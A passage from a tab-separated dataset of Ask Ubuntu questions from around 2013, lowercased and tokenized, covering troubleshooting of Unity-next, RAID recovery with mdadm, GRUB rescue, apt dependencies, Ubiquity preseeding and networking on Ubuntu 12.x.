04/apr/2013:17:18:38 +0200 ] [ job 66 ] copying print data ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] backendrunloop ( print_fd=-1 , device_fd=6 , snmp_fd=5 , addr=0x7f949cfb99b8 , use_bc=0 , side_cb=0x7f949c4b9750 ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] start rendering ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] processing page 1 ... d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] backend returned status 1 ( failed ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] job held for 300 seconds since it could not be sent . d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] end of messages d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] printer-state=3 ( idle ) d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] printer-state-message= '' processing page 1 ... '' d [ 04/apr/2013:17:18:38 +0200 ] [ job 66 ] printer-state-reasons=none any idea what could be going wrong ?
277883	how to get the current size of my ubuntu installation ?	i 've been going through my ubuntu set up and tweaking all of my configurations and removing unnecessary packages and programs to create my perfect linux desktop . is there any way to get the current size of my installation and it 's packages ?
277884	setup firewall : ask user to allow new incoming/outgoing traffic ?	i 'm using ubuntu 12.10 and as i know there is already a firewall on any ubuntu system . it 's ufw and because i like fancy gui stuff i can use gufw , that 's very nice . now i would like to configure this firewall . i want always a notification if there is some incoming or outgoing traffic . the user should be able to choose allow once , allow always for this or refuse . can i do this with gufw ? or do i need another firewall ? what do i have for options ? thank you
277888	how to run unity next on a virtualbox ?	i have 12.04 running as my main os . i only have ubuntu , so i can not afford to screw it up . i installed 13.04 on a virtualbox and compiled and install unity-next to try it . when i ran it from inside the unity desktop , virtualbox crashed . one of my installations completely broke ubuntu 13.04 , so i had to even reinstall it . to find out the problem i used xinit to login and when i ran the unity/unit-next/run , following message showed up . is it possible to run unity-next on virtualbox . is there some changes i need to make to run it . does upgrading the virtualbox helps . below is the log from terminal . module 'hudclient ' does not contain a module identifier directive - it can not be protected from external registrations . segmentation fault ( core dumped ) username @ username-virtualbox : ~/unity/unity-next $ ./run module 'hudclient ' does not contain a module identifier directive - it can not be protected from external registrations . qobject : :connect : no such signal lenses : :rolenameschanged ( qhash < int , qbytearray > ) in /home/username/unity/unity-next/plugins/utils/qsortfilterproxymodelqml.cpp:73 received a sourcemodel that does not notify of changes of its rolenames ** ( process:2492 ) : warning ** : could not make client connection : [ gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such method `createquery ' ] ** ( process:2492 ) : critical ** : hud_client_query_constructed : assertion `hud_client_connection_new_query ( cquery- > priv- > connection , cquery- > priv- > query , & path , & results , & appstack ) ' failed file : ///home/username/unity/unity-next/shell.qml:189 : typeerror : can not call method 'unfocuscurrentapplication ' of undefined notice : the ubuntu.application plugin was not found , so all window management is emulated in this application . this emulation will not be perfect , you *must* not trust it . to be safe always test on a device with ubuntu.application available . file : ///home/username/unity/unity-next/shell.qml:444:13 : qml connections : can not assign to non-existent property `` onsidestagefocusedapplicationchanged '' file : ///home/username/unity/unity-next/shell.qml:444:13 : qml connections : can not assign to non-existent property `` onmainstagefocusedapplicationchanged '' file : ///home/username/unity/unity-next/hud/hudparametrizedactionspage.qml:138:5 : qml item : binding loop detected for property `` width '' fail to load themed icon for : `` audio-volume-high '' file : ///home/username/unity/unity-next/panel/indicatoritem.qml:48:9 : qml qquickimage : failed to get image from provider : image : //gicon/audio-volume-high fail to load themed icon for : `` wifi-none '' file : ///home/username/unity/unity-next/panel/indicatoritem.qml:48:9 : qml qquickimage : failed to get image from provider : image : //gicon/wifi-none fail to load themed icon for : `` audio-volume-high '' file : ///home/username/unity/unity-next/panel/menus/overview/overviewgrid.qml:58:17 : qml qquickimage : failed to get image from provider : image : //gicon/audio-volume-high fail to load themed icon for : `` wifi-none '' file : ///home/username/unity/unity-next/panel/menus/overview/overviewgrid.qml:58:17 : qml qquickimage : failed to get image from provider : image : //gicon/wifi-none opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table libgl error : failed to load driver : vboxvideo libgl error : try again with libgl_debug=verbose for more details . opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo opengl warning : xgetvisualinfo returned 0 visuals for 0x24784f0 opengl warning : retry with 0x8002 returned 0 visuals opengl warning : glxgetfbconfigattrib for 0x24784f0 , failed to get xvisualinfo unrecognized opengl version unrecognized opengl version opengl warning : glxchoosefbconfig returning null , due to attrib=0xc , next=0x18 opengl warning : glxchoosefbconfig returning null , due to attrib=0xc , next=0x18 unrecognized opengl version unrecognized opengl version file : ///home/username/unity/unity-next/components/crossfadeimage.qml:39 : unable to assign qsize to qsizef file : ///home/username/unity/unity-next/components/crossfadeimage.qml:39 : unable to assign qsize to qsizef __showheader is deprecated . do not use it . qobject : :connect : no such signal qquicklistmodel : :rolenameschanged ( qhash < int , qbytearray > ) in /home/username/unity/unity-next/plugins/utils/qsortfilterproxymodelqml.cpp:73 received a sourcemodel that does not notify of changes of its rolenames qobject : :connect : no such signal qquicklistmodel : :rolenameschanged ( qhash < int , qbytearray > ) in /home/username/unity/unity-next/plugins/utils/qsortfilterproxymodelqml.cpp:73 received a sourcemodel that does not notify of changes of its rolenames qobject : :connect : no such signal qquicklistmodel : :rolenameschanged ( qhash < int , qbytearray > ) in /home/username/unity/unity-next/plugins/utils/qsortfilterproxymodelqml.cpp:73 received a sourcemodel that does not notify of changes of its rolenames qobject : :connect : no such signal qquicklistmodel : :rolenameschanged ( qhash < int , qbytearray > ) in /home/username/unity/unity-next/plugins/utils/qsortfilterproxymodelqml.cpp:73 received a sourcemodel that does not notify of changes of its rolenames warn 2013-04-04 18:07:57 unity.glib.dbus.proxy glibdbusproxy.cpp:418 calling method `` search '' on object path : `` /com/canonical/unity/lens/people '' failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name com.canonical.unity.lens.people was not provided by any .service files file : ///home/username/unity/unity-next/dash/dashmusic.qml:94 : referenceerror : root is not defined file : ///home/username/unity/unity-next/components/openeffect.qml:27 : typeerror : can not read property 'width ' of null file : ///home/username/unity/unity-next/dash/dashpeople.qml:118 : referenceerror : root is not defined file : ///home/username/unity/unity-next/components/openeffect.qml:27 : typeerror : can not read property 'width ' of null file : ///home/username/unity/unity-next/dash/dashvideos.qml:142 : referenceerror : root is not defined warn 2013-04-04 18:07:57 unity.glib.dbus.proxy glibdbusproxy.cpp:418 calling method `` inforequest '' on object path : `` /com/canonical/unity/lens/mockmusic '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /com/canonical/unity/lens/mockmusic warn 2013-04-04 18:07:57 unity.glib.dbus.proxy glibdbusproxy.cpp:418 calling method `` setviewtype '' on object path : `` /com/canonical/unity/lens/mockmusic '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /com/canonical/unity/lens/mockmusic warn 2013-04-04 18:07:57 unity.glib.dbus.proxy glibdbusproxy.cpp:418 calling method `` search '' on object path : `` /com/canonical/unity/lens/mockmusic '' failed : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `com.canonical.unity.lens ' on object at path /com/canonical/unity/lens/mockmusic ^cnumber of leaked pixmaps : 84 i
277893	how do i prevent unity from displaying my photos from facebook and google+ ?	the title pretty much says it all . i do n't want to see my `` friends ' '' pictures , if i do n't want to . i tried to install unity-next following a tutorial from omgubuntu.co.uk , i removed all of its dependencies , but something might have gotten by me , that had this feature in it . i 'm using ubuntu 12.10 ( amd64 ) .
277896	i ca n't find older version of wubi !	here it arrive only to 2009 http : //sourceforge.net/projects/wubi/files/wubi/ how is possible ? i need wubi 11.10 ! ! ! anybody can help me ?
277900	why i have to type my password after exiting a sudo -i session ?	sudo -i in the terminal will made normal user into root user & after changing into root user if we exit then again we will be back to normal user.if we try again , next time it directly takes me into a root user without asking the password . so why this is happening and what 's the timeout of this facility ?
277910	why did i have to edit /etc/lsb-release to get apt-get to work ?	i ca n't open the software sources window from the software center . i ca n't use apt-get add-apt-repository ( and other things ) . the error i get with add-apt-repository is : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 160 , in < module > sp = softwareproperties ( options=options ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 96 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 584 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python2.7/dist-packages/aptsources/distro.py '' , line 87 , in get_sources raise nodistrotemplateexception ( `` error : could not find a `` aptsources.distro.nodistrotemplateexception : error : could not find a distribution template my old /etc/lsb-release looks like : distrib_id=ubuntu distrib_release=12.10 distrib_codename=quantal distrib_description= '' ubuntu quantal ( development branch ) '' i changed it to be : distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu precise '' and suddenly things `` work '' again . i do n't trust it , since i 'm effecitvely lying that i have an earlier version . why did i have to make this change ? what can i do to get things working in a more sane fashion ?
277918	xubuntu not showing emblems in desktop	in xubuntu , icons in desktop do n't show their emblems , no matter if they are links , directories or files . they appear to be ok in thunar and nautilus for the same files/directories . how can i make emblems appear in desktop ? i use xubuntu 12.10 and xfce 4.12 .
277920	nas raid 5 recovery using mdadm : volume and mount issues , please help	hello this is my first foray into ubuntu , or any form of linix for that matter , as well as my first attempt to ever recover a lost a raid , but i 'm a fairly quick study . i have an 8tb wd sharespace , four 2tb drives set up on raid 5 with two `` failed '' ( maybe not ) drives . i 'm desperate to recover my data . aside from all the music and movies and games etc , all my photos and home videos of my children growing up are on this thing and i 'm fairly desperate to recover them . aside from preferring to do things myself i ca n't afford professional data recovery . i do not have back-up drives to copy my originals and i ca n't afford them so i 'm stuck trying to do this myself with the original disks . any help is appreciated . forgive me if i over explain as i 'm not really sure what 's relevant and what is n't as i 'm trying to figure this out . i believe the controller in my nas has failed and the data is actually still intact on the drives . i 've pulled all four drives out of the nas and put them in order in my comp disconnected my normal hdd 's and am using the live cd in try mode to run ubuntu . i 've been trying to do this thus far using this guide : howto : sharespace raid 5 data recovery , but i 've run into a few snags along the way and the entire forum is closed so i ca n't ask questions there . the first thing i did was to set myself at the root user and check to make sure all my drives were in the right place and recognized . using fdisk -l disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 417689 208844+ fd linux raid autodetect /dev/sda2 417690 2506139 1044225 fd linux raid autodetect /dev/sda3 2506140 2923829 208845 fd linux raid autodetect /dev/sda4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 417689 208844+ fd linux raid autodetect /dev/sdb2 417690 2506139 1044225 fd linux raid autodetect /dev/sdb3 2506140 2923829 208845 fd linux raid autodetect /dev/sdb4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 417689 208844+ fd linux raid autodetect /dev/sdc2 417690 2506139 1044225 fd linux raid autodetect /dev/sdc3 2506140 2923829 208845 fd linux raid autodetect /dev/sdc4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 1 417689 208844+ fd linux raid autodetect /dev/sdd2 417690 2506139 1044225 fd linux raid autodetect /dev/sdd3 2506140 2923829 208845 fd linux raid autodetect /dev/sdd4 2923830 3907024064 1952050117+ fd linux raid autodetect not really knowing what i 'm looking for , but not seeing anything that sent up any red flags , they all look pretty intact and healthy to me , so i proceed with trying to assemble the raid from the sd*4 partitions which are supposed to be the ones with the data to rebuild the raid . i tried : mdadm -- assemble /dev/md0 /dev/sda4 /dev/sdb4 /dev/sdc4 /dev/sdd4 but i got an error about 2 drives and not being enough so began to scour the internet and learned there was a force command so i used it : mdadm -- assemble -- force /dev/md0 /dev/sda4 /dev/sdb4 /dev/sdc4 /dev/sdd4 and that seemed to work . yay ! ... sort of ... vgscan no volume groups found boo ... so back to scouring the internet i found a post where someone was having a similar problem and had to recreate their volume and local groups to successfully access their data . using the names for the volume groups and local groups from the guide i was using i created them using the new commands i found : vgcreate vg0 /dev/md0 and lvcreate -l5.45t -n lv0 vg0 both reported being created and all seemed good in the world . until , going back to my guide i tried to mount it : mkdir /mnt/raid mount -t auto /dev/vg0/lv0 /mnt/raid mount : you must specify the filesystem type apparently `` auto '' does n't work like the guide said . poking around the net i 've found a couple filesystem types ext3 and ext 4 so i tried them too : mount -t ext3 /dev/vg0/lv0 /mnt/raid mount : wrong fs type , bad option , bad superblock on /dev/mapper/vg0-lv0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so and mount -t ext4 /dev/vg0/lv0 /mnt/raid mount : wrong fs type , bad option , bad superblock on /dev/mapper/vg0-lv0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so as you can see neither worked ... so after several hours more of searching i 've come to the conclusion that i really need to ask for help . if anyone has any suggestions , or advice , or even better knows how to make this work , i 'd really appreciate the insight . if i did something wrong that would also be really good to know . i figured this might also be useful : mdadm -- detail /dev/md0 /dev/md0 : version : 0.90 creation time : thu dec 10 05:44:29 2009 raid level : raid5 array size : 5854981248 ( 5583.75 gib 5995.50 gb ) used dev size : 1951660416 ( 1861.25 gib 1998.50 gb ) raid devices : 4 total devices : 3 preferred minor : 0 persistence : superblock is persistent update time : thu apr 4 08:12:03 2013 state : clean , degraded active devices : 3 working devices : 3 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 64k uuid : dd69553d:5c832cf7:9755c9c8 : d208511e events : 0.3986045 number major minor raiddevice state 0 8 4 0 active sync /dev/sda4 1 8 20 1 active sync /dev/sdb4 2 8 36 2 active sync /dev/sdc4 3 0 0 3 removed as well as this : cat /proc/mdstat personalities : [ raid6 ] [ raid5 ] [ raid4 ] md0 : active raid5 sda4 [ 0 ] sdc4 [ 2 ] sdb4 [ 1 ] 5854981248 blocks level 5 , 64k chunk , algorithm 2 [ 4/3 ] [ uuu_ ] unused devices : < none > this is what my fdisk -l looks like now after playing around with all this : fdisk -l disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 417689 208844+ fd linux raid autodetect /dev/sda2 417690 2506139 1044225 fd linux raid autodetect /dev/sda3 2506140 2923829 208845 fd linux raid autodetect /dev/sda4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 417689 208844+ fd linux raid autodetect /dev/sdb2 417690 2506139 1044225 fd linux raid autodetect /dev/sdb3 2506140 2923829 208845 fd linux raid autodetect /dev/sdb4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/sdc : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 417689 208844+ fd linux raid autodetect /dev/sdc2 417690 2506139 1044225 fd linux raid autodetect /dev/sdc3 2506140 2923829 208845 fd linux raid autodetect /dev/sdc4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/sdd : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 1 417689 208844+ fd linux raid autodetect /dev/sdd2 417690 2506139 1044225 fd linux raid autodetect /dev/sdd3 2506140 2923829 208845 fd linux raid autodetect /dev/sdd4 2923830 3907024064 1952050117+ fd linux raid autodetect disk /dev/md0 : 5995.5 gb , 5995500797952 bytes 2 heads , 4 sectors/track , 1463745312 cylinders , total 11709962496 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 196608 bytes disk identifier : 0x00000000 disk /dev/md0 does n't contain a valid partition table disk /dev/mapper/vg0-lv0 : 5992.3 gb , 5992339210240 bytes 255 heads , 63 sectors/track , 728527 cylinders , total 11703787520 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 65536 bytes / 196608 bytes disk identifier : 0x00000000 disk /dev/mapper/vg0-lv0 does n't contain a valid partition table please keep in mind that i 'm still new at this so it would be highly appreciated if any advice could please come with some basic understanding of why you are making your suggestion . it will help me greatly understand more of what i 'm doing . thank you !
277925	ubi-partman failed with exit code 141	i was using windows 7 and i installed ubuntu on it without an error then i installed windows 8 and used installed ubuntu for some time . when i decided to install ubuntu ( 12 . 04 version ) on my pc again i faced this error `` ubi-partman crashed '' . `` ubi-partman failed with exit code 141 . further information may be found in /var/log/syslog . do you want to try running this step again before continuing ? if you do not , your installation may fail entirely or may be broken. `` after that i tried to install it on my dell inspiron laptop that runs windows 8 and i have the same problem . but i was really amazed when i installed it on my hp probook 4530s that has windows 7 and i did n't see that error anymore . note that this error did n't appear when i tried to install ubuntu 12 . 10 but i need to install ubuntu 12 . 04 for some reasons . another thing is that error shows up in installation and before partition choosing list .
277926	storing files in the partition containing os	my hdd is partitioned into 220gigs n 250 gigs approx.im able to store files on one of these partitions but i cant store any files on the other partition having the os.the paste option never appears.i would like to use this space to store some files temporarily.could you guys help me ? if this question was asked previously im extremely sorry . thanks in advance folks
277927	ubuntu 12.10 wireless reports it is working , but actually doesnt	i have ubuntu 12.10 installed with windows 7 on a partitioned hard drive in a new gateway tower . my wireless card is made by realtek . the install went fine , i was able to connect to wireless to install updates and whatnot . however , at some point both wired and wireless internet began working poorly/not at all in ubuntu . the aggravating part is : ubuntu claims both are working just fine and both work great in windows . at the moment i am online with an ethernet cable which the network manager says is running at 1000mbs and also have available a wireless network at 130mbs . however the connection continually goes in and out ( which is not registered in the network center , i just cant open webpages , install packages or even ping external websites ) . at this very moment i can chat in gchat , but can not load new pages in ask ubuntu forums or download updates . i have spent several hours in forums trying to fix this , but am otherwise a novice with linux . i tried installing a new driver for the wireless card , but am not sure it worked , as in the install report one error message : module 8192cu does not exist in /proc/modules . no drivers appear in software sources . any help would be tremendously appreciated .
277929	how to select english ( us ) keyboard layout when preseeding with ubiquity	i am attempting to automate an install of the ubuntu 12.10 livecd ( on a usb ) . the installer will do everything except automatically pick a keyboard layout . below is the portion of my preseed3.cfg that should select the language and keyboard layout . ubiquity will correctly install everything , it just requires that i choose a keyboard layout before it will proceed . ubiquity languagechooser/language-name select english ubiquity countrychooser/shortlist select us ubiquity time/zone select america/los_angeles ubiquity debian-installer/locale select en_us.utf-8 ubiquity localechooser/supported-locales multiselect en_us.utf-8 ubiquity console-setup/ask_detect boolean false ubiquity console-setup/layoutcode string us ubiquity console-setup/modelcode string skip ubiquity keyboard-configuration/variant select english ( us ) ubiquity keyboard-configuration/layout select english ( us ) ubiquity keyboard-configuration/model select generic 105-key ( intl ) pc ubiquity console-keymaps-at/keymap select us ubiquity keyboard-configuration/xkb-keymap select us console-setup console-setup/layoutcode string us console-setup console-setup/layout select u.s. english console-setup console-setup/variantcode select u.s. english console-setup console-setup/codeset select . combined - latin ; slavic cyrillic ; hebrew ; basic arabic here is the portion of my menu which launches the installer and loads preseed3.cfg into the initrd . label unattended menu label ^unattended installation kernel /casper/vmlinuz append cdrom-detect/try-usb=true file=/cdrom/preseed/preseed3.seed boot=casper automatic-ubiquity initrd=/casper/initrd.lz quiet splash noprompt -- -
277930	what does gnome-settings-daemon is not ready for configuration mean ?	on a recent ubuntu 12.10 install , something innocent like apt-get install xfonts-75dpi is giving this message : dpkg : error processing gnome-settings-daemon ( -- configure ) : package gnome-settings-daemon is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : gnome-settings-daemon e : sub-process /usr/bin/dpkg returned an error code ( 1 ) when i open the ubuntu software center , it says the package is installed . i do n't know what the gnome-settings-daemon is , but i do see it running : hostname : ~ > ps auxww | grep gnome-settings username 2468 0.1 0.1 744532 17396 ? sl 12:54 0:00 /usr/lib/gnome-settings-daemon/gnome-settings-daemon username 2513 0.0 0.0 452380 9268 ? sl 12:54 0:00 /usr/lib/gnome-settings-daemon/gnome-fallback-mount-helper what configuration has not been done ? how do i get the daemon to be ready for configuration ? or , what diagnostic tools ( e.g . logs ) are relevant ?
277931	dropbox 'copy public link ' in thunar file manager ( xfce )	i 'm using xubuntu and was a bit saddened that i could n't use dropbox within thunar file manager . can i make a custom context menu option to 'copy public link ' in thunar ?
277934	how do i find location of packages	i am trying to install several things on my machine . for example php-pear . i need to put to location of the repository in sources.list how can i locate it ?
277935	how to uninstall mathematica 9 from ubuntu ?	i 'd like to know how can i uninstall mathematica from ubuntu . apt-get remove does not work .
277939	copy files from a server via ssh to dropbox .	i have a user in a linux server ( debian ) with ssh access , and have some files on it . i need to copy the files to my dropbox . but i donot want to copy to my dropbox in my pc and laptop , i want to first copy to my dropbox account directly then sync to my pc and laptop . is scp work ?
277943	second monitor missing skype and guake panel icons ( indicators )	i have a dual monitor set up . on the primary monitor i have my launcher and my panel as always . the panel shows all my usual indicators for volume , network manager , skype , everpad , dropbox , etc . i 've set the systray-whitelist to `` all '' using dconf-editor . however , on my second monitor 's panel , the skype and guake indicators are missing . the other 7 or 8 are there however . anyway to get this fixed ? is it a bug ?
277946	video support in amarok	it seems that amarok is supposed to have support for listening to youtube videos as a music source : http : //amarok.kde.org/fr/node/502 i can not find this feature in the `` configure applets '' button 's popup ( found in the lower-right corner of the amarok window ) , nor in settings - > configure amarok - > plugins . is this feature not available in the kubuntu builds of amarok ? this is on kubuntu 12.10 with kde 4.9.4 and amarok 2.6.0 .
277948	uninstall with kde menu	i 'm running kubuntu 12.04 . after i installed xfce 4 on my system with : sudo add-apt-repository ppa : xubuntu-dev/xfce-4.10 sudo apt-get update sudo apt-get install xubuntu-desktop now i am able to right click mouse on kde menu to get additional option uninstall i can delete software straight from desktop - from kde menu how can i get this without installing xfce ?
277949	install gnome desktop in kubuntu	i am trying to install gnome desktop from kubuntu . so i did this : sudo apt-get install ubuntu-desktop it ran well but now i am getting this error : sudeep @ sudeep : ~ $ sudo apt-get install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done ubuntu-desktop is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 20.0+build1-0ubuntu0.12.10.3 ) but it is not going to be installed firefox-gnome-support : depends : firefox but it is not going to be installed lightdm-remote-session-uccsconfigure : depends : firefox but it is not going to be installed xul-ext-websites-integration : depends : firefox ( > = 9.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . please help me correct this . edit sudo apt-get -f install ubuntu-desktop reading package lists ... done building dependency tree reading state information ... done ubuntu-desktop is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : firefox-globalmenu : depends : firefox ( = 20.0+build1-0ubuntu0.12.10.3 ) but it is not going to be installed firefox-gnome-support : depends : firefox but it is not going to be installed lightdm-remote-session-uccsconfigure : depends : firefox but it is not going to be installed xul-ext-websites-integration : depends : firefox ( > = 9.0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
277950	slow download/upload speed in ubuntu 12.10	a few days ago i installed ubuntu 12.10 and am experiencing slow download/upload speeds . all my other computers connected via wireless are running fine with their normal 30mb/s down and 5mb/s up , but my ubuntu box just refuses to give me anything more than 10mb/s down and about 1mb/s up as measured by speedtest.net . ping fluctuates too : although speedtest.net says it 's at 49ms , if you open a term and type in ping www.google.com the numbers are all over the place . i 've tried adjusting everything from mtu to getting compat-drivers to run on my system and nothing i do seems to help . i 've googled just about every howto i could find and tried to follow them all , with no change to the results i 'm seeing . is there anyway to fix this ? i even tried wicd and it did not give me any better results .
277951	how to use grub rescue when grub error is `` file not found ''	i have two visible boot partitions , one of which is historical only , so i wanted to stop grub from creating boot menu options for it . i renamed /boot and moved /vmlinux and /initrd.img away from it 's root . then i ran update-grub . all seemed well until i rebooted , when grub reported `` file not found '' and dropped into grub rescue . my active system is xubuntu 12.04 , fresh install . the historical one is ubuntu 11.10 . looking at other questions and answers here , i tried ls set prefix= ( hd2 , msdos2 ) /boot/grub set root= ( hd2 , msdos2 ) set ls /boot insmod /boot/grub/linux.mod ( at which point the font color changed to intense white ) i continued with linux /vmlinuz root=/dev/sda2 ro initrd /initrd.img ( at which point , grub rescue started giving the error message `` no such partition '' , even to repeats of the insmod or linux commands above ) . what did i do wrong ?
277955	ubuntu archive api ?	i 'm trying to query the ubuntu archive on a machine that does n't have python-apt installed ( and for reasons beyond my control ca n't have python-apt installed ) . is there an api endpoint for packages.ubuntu.com or a similar service which i can query to find out : is there a package ? if so , basic attributes like summary , version , series ?
277958	wobbly windows in ubuntu 12.10	i have ubuntu 12.10 installed on my samsung q330 laptop , but i noticed that the wobbly windows option is nowhere to be found . can someone help ?
